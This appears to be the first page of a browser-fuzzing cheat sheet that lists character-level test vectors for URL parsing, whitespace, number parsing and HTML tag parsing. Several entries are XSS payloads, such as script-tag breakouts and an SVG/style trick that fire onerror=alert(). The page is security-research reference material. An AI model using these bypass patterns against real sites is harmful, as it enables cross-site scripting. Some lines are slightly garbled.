Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 188 vectors with results
This uses the query property to detect if the character is a question mark
if (new URL("https://example.com" + String.fromCodePoint(35) + "foo").hash.includes("foo")) alert(i)if (new URL("https://example.com" + String.fromCodePoint(63) + "foo").search.includes("foo")) alert(i)if (new URL("https://example.com" + String.fromCodePoint(47) + "foo").pathname.includes("foo")) alert(i)if (new URL("https://example.com" + String.fromCodePoint(92) + "foo").pathname.includes("foo")) alert(i)if (new URL("https://example.com"+String.fromCodePoint(9)+":8000").hostname=="example.com") alert(9)Tests which characters are ignored in hostname within a URL constructor before colon.
if (new URL("https://example.com"+String.fromCodePoint(10)+":8000").hostname=="example.com") alert(10)Tests which characters are ignored in hostname within a URL constructor before colon.
if (new URL("https://example.com"+String.fromCodePoint(13)+":8000").hostname=="example.com") alert(13)Tests which characters are ignored in hostname within a URL constructor before colon.
if (new URL("https://example.com"+String.fromCodePoint(35)+":8000").hostname=="example.com") alert(35)Tests which characters are ignored in hostname within a URL constructor before colon.
if (new URL("https://example.com"+String.fromCodePoint(47)+":8000").hostname=="example.com") alert(47)Tests which characters are ignored in hostname within a URL constructor before colon.
if (new URL("https://example.com"+String.fromCodePoint(0)).hostname=="example.com") alert(0)if (new URL("https://example.com"+String.fromCodePoint(1)).hostname=="example.com") alert(1)if (new URL("https://example.com"+String.fromCodePoint(2)).hostname=="example.com") alert(2)if (new URL("https://example.com"+String.fromCodePoint(3)).hostname=="example.com") alert(3)if (new URL("https://example.com"+String.fromCodePoint(4)).hostname=="example.com") alert(4)if (new URL("https:"+String.fromCodePoint(9)+"example.com").hostname=="example.com") alert(9)Tests which characters are ignored or act as a forward slash after protocol within a URL constructor.
if (new URL("https:"+String.fromCodePoint(10)+"example.com").hostname=="example.com") alert(10)Tests which characters are ignored or act as a forward slash after protocol within a URL constructor.
if (new URL("https:"+String.fromCodePoint(13)+"example.com").hostname=="example.com") alert(13)Tests which characters are ignored or act as a forward slash after protocol within a URL constructor.
if (new URL("https:"+String.fromCodePoint(47)+"example.com").hostname=="example.com") alert(47)Tests which characters are ignored or act as a forward slash after protocol within a URL constructor.
if (new URL("https:"+String.fromCodePoint(64)+"example.com").hostname=="example.com") alert(64)Tests which characters are ignored or act as a forward slash after protocol within a URL constructor.
try{alert(9)โฆ09โง}catch(e){}This vector shows which characters are valid variables after a valid variable character.
This vector shows which characters are valid variables after a valid variable character.
This vector shows which characters are valid variables after a valid variable character.
This vector shows which characters are valid variables after a valid variable character.
const c = String.fromCodePoint(i);0x0D
if (parseFloat("13"+c+"37") === 13.37 || Number("13"+c+"37") === 13.37) alert(i);Fuzzes for characters that are treated as decimal separators in either parseFloat or the Number constructor.
const c = String.fromCodePoint(i);0x0D
if ((c+"hello"+c).trim() === "hello") alert(i);This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
/^\s+$/.test(String.fromCodePoint(9)) && alert(9)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(10)) && alert(10)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(11)) && alert(11)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(12)) && alert(12)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(13)) && alert(13)This vector shows which characters are valid whitespace characters in a \s escape sequence.
<a0x09id="test">Characters allowed in between start of HTML tag name and event handler
<a
id="test"><a0x0Cid="test">Characters allowed in between start of HTML tag name and event handler
<a0x0Did="test">Characters allowed in between start of HTML tag name and event handler
<a id="test"><script>0x0D
a="</script0x09><img src=data: onerror=alert(9)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script
><img src=data: onerror=alert(10)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script0x0C><img src=data: onerror=alert(12)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script0x0D><img src=data: onerror=alert(13)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script ><img src=data: onerror=alert(32)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<svg /><style><!--</style><img src onerror=alert(47)>This vector uses SVG to determine which characters cause a self closing tag.
Characters that are may be part of HTML tag names. These are less strict that the first character
Page 1 of 10